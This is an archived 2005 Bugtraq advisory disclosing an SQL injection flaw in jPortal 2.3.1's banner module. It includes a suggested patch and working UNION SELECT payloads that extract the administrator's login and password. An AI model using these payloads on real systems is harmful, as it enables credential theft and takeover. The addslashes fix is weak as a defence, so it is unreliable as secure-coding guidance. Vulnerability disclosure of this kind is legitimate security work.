Bugtraq mailing list archives
Sql injection in jPortal version 2.3.1 (module banner)
From: "Marcin \"CiNU5\" Krupowicz" <marcin.krupowicz () gmail com>
Date: Mon, 11 Apr 2005 23:28:28 +0200
Hello BugTraq, I've found possibility to inject sql code in jPortal version 2.3.1, in module "banner" (module/banner.inc.php). Bug is in these lines of code: [code] $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; [/code] - line 192. There is unfiltered variable $haslo. In order to patch this code just do this: [code] $haslo = addslashes($haslo); $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; [/code] [exploit] go to http://[victim]/jportal/banner.php and try this: ' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 and then: ' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 After that, You gain login and password of administrator. [/exploit] [exploit2] try to inject this code: ' or id='x x - banner id After that, You can see statistics of not banners, to which you haven't got passwords. [/exploit2] Vendor (http://jportal2.com) has been informed already. -- Best regards, Marcin "CiNU5" Krupowicz
Current thread:
- Sql injection in jPortal version 2.3.1 (module banner) Marcin "CiNU5" Krupowicz (Apr 11)
- <Possible follow-ups>
- Sql injection in jPortal version 2.3.1 (module banner) Marcin "CiNU5" Krupowicz (Apr 12)